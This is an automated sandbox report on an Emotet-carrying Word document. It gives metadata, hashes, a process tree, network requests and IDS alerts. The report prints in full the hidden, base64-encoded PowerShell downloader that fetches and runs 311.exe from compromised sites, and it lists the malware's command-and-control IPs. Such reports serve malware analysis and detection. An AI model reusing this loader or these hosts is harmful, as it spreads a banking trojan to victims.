File name: | Dokument-94756816-22-05-2019.doc |
Full analysis: | https://app.any.run/tasks/8576574b-7940-4cf5-8fe3-91daef805786 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | May 24, 2019, 09:24:32 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Alabama bottom-line connecting, Subject: enterprise, Author: Daija Ritchie, Comments: Sweden drive Soft, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed May 22 07:53:00 2019, Last Saved Time/Date: Wed May 22 07:53:00 2019, Number of Pages: 1, Number of Words: 10, Number of Characters: 61, Security: 0 |
MD5: | ADCEDC7700D40A0E372B1D18C298B030 |
SHA1: | FF72510A0115B19F536D96A5465F5466A417226F |
SHA256: | 0CEA57624431C067025D38CDB5578713605C2F6B4C0979FED34BFA617B21928B |
SSDEEP: | 3072:j77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qZwC1pmfGbzJDP:j77HUUUUUUUUUUUUUUUUUUUT52VbCpmk |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Manager: | Farrell |
---|---|
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 70 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Towne Inc |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 61 |
Words: | 10 |
Pages: | 1 |
ModifyDate: | 2019:05:22 06:53:00 |
CreateDate: | 2019:05:22 06:53:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | Sweden drive Soft |
Keywords: | - |
Author: | Daija Ritchie |
Subject: | enterprise |
Title: | Alabama bottom-line connecting |
CompObjUserType: | Microsoft Word 97-2003 Document |
CompObjUserTypeLen: | 32 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2436 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Dokument-94756816-22-05-2019.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2984 | pOwershell -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABHAGoAVABhAHIATQBSAE0APQAnAFkAagBxAFUAMwBkAEwAJwA7ACQAWgBqAHIAXwBpAFIAIAA9ACAAJwAzADEAMQAnADsAJABZADUAYQA1AHcATwB1AFoAPQAnAEwAdwAxAGgAaABkACcAOwAkAEkAcwAzAEQAMQBDAEwAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFoAagByAF8AaQBSACsAJwAuAGUAeABlACcAOwAkAFkAZgBsADMAWABsAD0AJwBXAEsAcwBPAHcATwBVACcAOwAkAEoAXwAxAHAAdwBkAHAAPQAmACgAJwBuAGUAdwAtAG8AYgBqAGUAJwArACcAYwAnACsAJwB0ACcAKQAgAG4ARQB0AC4AdwBlAEIAYABjAEwAaQBgAEUAbgB0ADsAJABtAGMARQBzAFYATwAwAD0AJwBoAHQAdABwADoALwAvAHMAdwBlAGUAdABoAHMAdQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AdAB2AGsAbwBxADIANwA0ADcANgAvAEAAaAB0AHQAcAA6AC8ALwBlAHIAcABhAGgAbwBtAGUALgBjAG8AbQAvAHcAcAAtAHMAbgBhAHAAcwBoAG8AdABzAC8AeQAxADQAMQAvAEAAaAB0AHQAcAA6AC8ALwBiAGUAbABlAGQAaQB5AGUAZABhAG4AaQBzAG0AYQBuAGwAaQBrAC4AbgBlAHQALwB3AHAALQBhAGQAbQBpAG4ALwAxADIAMwAyADMAMQAvAEAAaAB0AHQAcABzADoALwAvAGUAdgBvAHkAYQBnAGUAbwBmAGQAaQBzAGMAbwB2AGUAcgB5AC4AYwBvAG0ALwBhAHAAaQAvAHAAcQBxADUANgA2ADYANgAvAEAAaAB0AHQAcAA6AC8ALwBzAGgAZQBmAGkAZQBsAGQAYgBkAGMALgBjAG8AbQAvAGwAYQBuAGcAdQBhAGcAZQAvAHgAYgBjAHgANQAyADYALwAnAC4AcwBwAGwASQB0ACgAJwBAACcAKQA7ACQATQBHAFoAbgBjAGQAMwA9ACcATABzAHEASgB6AFoAJwA7AGYAbwByAGUAYQBjAGgAKAAkAG4ARABCAGoAcAAwACAAaQBuACAAJABtAGMARQBzAFYATwAwACkAewB0AHIAeQB7ACQASgBfADEAcAB3AGQAcAAuAGQATwBXAE4AbABvAGEAZABGAEkATABlACgAJABuAEQAQgBqAHAAMAAsACAAJABJAHMAMwBEADEAQwBMACkAOwAkAHIAZABYAGwAaAB6AEwAWgA9ACcAawBhAGgAMABiAG0AQQAnADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEkAcwAzAEQAMQBDAEwAKQAuAEwARQBOAGcAdABIACAALQBnAGUAIAAyADYAMAA2ADQAKQAgAHsAJgAoACcASQAnACsAJwBuAHYAbwBrAGUAJwArACcALQBJAHQAZQBtACcAKQAgACQASQBzADMARAAxAEMATAA7ACQAZABCAEMAdQBUAFAAWQA9ACcAUABYAFMAcAB3AFoAMwAyACcAOwBiAHIAZQBhAGsAOwAkAE8ATwBOAG8ANABKAEkAbQA9ACcARABJAGkAQwBHAGEAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAagBSAFMAYQBMAHIAagA9ACcAbgB0AGsAawB2AEYAbAAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\pOwershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2796 | "C:\Users\admin\311.exe" | C:\Users\admin\311.exe | — | pOwershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2156 | --86037b71 | C:\Users\admin\311.exe | 311.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3796 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | 311.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
1352 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Integrity Level: MEDIUM | ||||
3640 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" "C:\Users\admin\AppData\Local\Temp\81DB.tmp" | C:\Users\admin\AppData\Local\soundser\soundser.exe | — | soundser.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
180 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" "C:\Users\admin\AppData\Local\Temp\81FB.tmp" | C:\Users\admin\AppData\Local\soundser\soundser.exe | — | soundser.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3496 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" /scomma "C:\Users\admin\AppData\Local\Temp\81DA.tmp" | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2436 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE50.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2984 | pOwershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\540V165TDSQQXD5ULJG5.temp | — | |
MD5:— | SHA256:— | |||
3640 | soundser.exe | C:\Users\admin\Documents\Outlook Files\~Outlook Data File - NoMail.pst.tmp | — | |
MD5:— | SHA256:— | |||
3640 | soundser.exe | C:\Users\admin\Documents\Outlook Files\~Outlook.pst.tmp | — | |
MD5:— | SHA256:— | |||
3640 | soundser.exe | C:\Users\admin\Documents\Outlook Files\[email protected] | — | |
MD5:— | SHA256:— | |||
3640 | soundser.exe | C:\Users\admin\AppData\Local\Temp\81DB.tmp | — | |
MD5:— | SHA256:— | |||
2436 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:6D3A5C75A9E7F6F7777F437015179879 | SHA256:3AD0D833FCF112465D7701E8EFDC8AAF203299DA3FAF3B0E5025801B792306ED | |||
2436 | WINWORD.EXE | C:\Users\admin\Desktop\~$kument-94756816-22-05-2019.doc | pgc | |
MD5:B8083E9A3069892CEA9852AD4C52A51B | SHA256:D17E0FC70AF36E9FE7026B2734CFAA5340E744A40E78A7F8C6B697D3EAB7B179 | |||
2436 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\551960A7.wmf | wmf | |
MD5:3F16311BF1745D93CD3264D925D69DEC | SHA256:CE374066D7D551B5A63157274AB214FA6F67AFB9A090D224DC6AA12095A26B5C | |||
2436 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Dokument-94756816-22-05-2019.doc.LNK | lnk | |
MD5:DE0782A48FAC839C5F43EB94799CCA49 | SHA256:40707A0965F1F00D1E09D2D12A519B5A24686E10EEC5C4D6CA87C20D489AF91D |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2984 | pOwershell.exe | GET | 301 | 185.179.24.151:80 | http://erpahome.com/wp-snapshots/y141/ | TR | — | — | malicious |
1352 | soundser.exe | POST | 200 | 159.65.241.220:8080 | http://159.65.241.220:8080/splash/arizona/ringin/ | US | binary | 820 Kb | malicious |
2984 | pOwershell.exe | GET | 404 | 66.212.30.244:80 | http://sweethsu.com/wp-admin/tvkoq27476/ | US | html | 35.3 Kb | unknown |
2984 | pOwershell.exe | GET | 200 | 91.227.6.120:80 | http://belediyedanismanlik.net/wp-admin/123231/ | TR | executable | 74.0 Kb | suspicious |
1352 | soundser.exe | POST | 200 | 216.98.148.157:8080 | http://216.98.148.157:8080/iplk/ | US | binary | 148 b | malicious |
1352 | soundser.exe | POST | 200 | 159.65.241.220:8080 | http://159.65.241.220:8080/usbccid/loadan/ringin/ | US | binary | 148 b | malicious |
1352 | soundser.exe | GET | 200 | 216.98.148.157:8080 | http://216.98.148.157:8080/whoami.php | US | text | 15 b | malicious |
1352 | soundser.exe | POST | 200 | 216.98.148.157:8080 | http://216.98.148.157:8080/img/jit/ringin/ | US | binary | 148 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2984 | pOwershell.exe | 185.179.24.151:80 | erpahome.com | Erhan Mahmut trading as Aysima Bilisim Teknolojileri Erhan Mahmut | TR | malicious |
2984 | pOwershell.exe | 66.212.30.244:80 | sweethsu.com | QuadraNet, Inc | US | unknown |
2984 | pOwershell.exe | 91.227.6.120:80 | belediyedanismanlik.net | Netinternet Bilisim Teknolojileri AS | TR | suspicious |
2984 | pOwershell.exe | 185.179.24.151:443 | erpahome.com | Erhan Mahmut trading as Aysima Bilisim Teknolojileri Erhan Mahmut | TR | malicious |
1352 | soundser.exe | 216.98.148.157:8080 | — | CariNet, Inc. | US | malicious |
1352 | soundser.exe | 159.65.241.220:8080 | — | — | US | malicious |
Domain | IP | Reputation |
---|---|---|
sweethsu.com |
| unknown |
erpahome.com |
| malicious |
belediyedanismanlik.net |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
2984 | pOwershell.exe | Generic Protocol Command Decode | SURICATA TLS invalid record type |
2984 | pOwershell.exe | Generic Protocol Command Decode | SURICATA TLS invalid record type |
2984 | pOwershell.exe | Generic Protocol Command Decode | SURICATA TLS invalid record type |
2984 | pOwershell.exe | Generic Protocol Command Decode | SURICATA TLS invalid record type |
2984 | pOwershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2984 | pOwershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2984 | pOwershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
1352 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
1352 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
1352 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |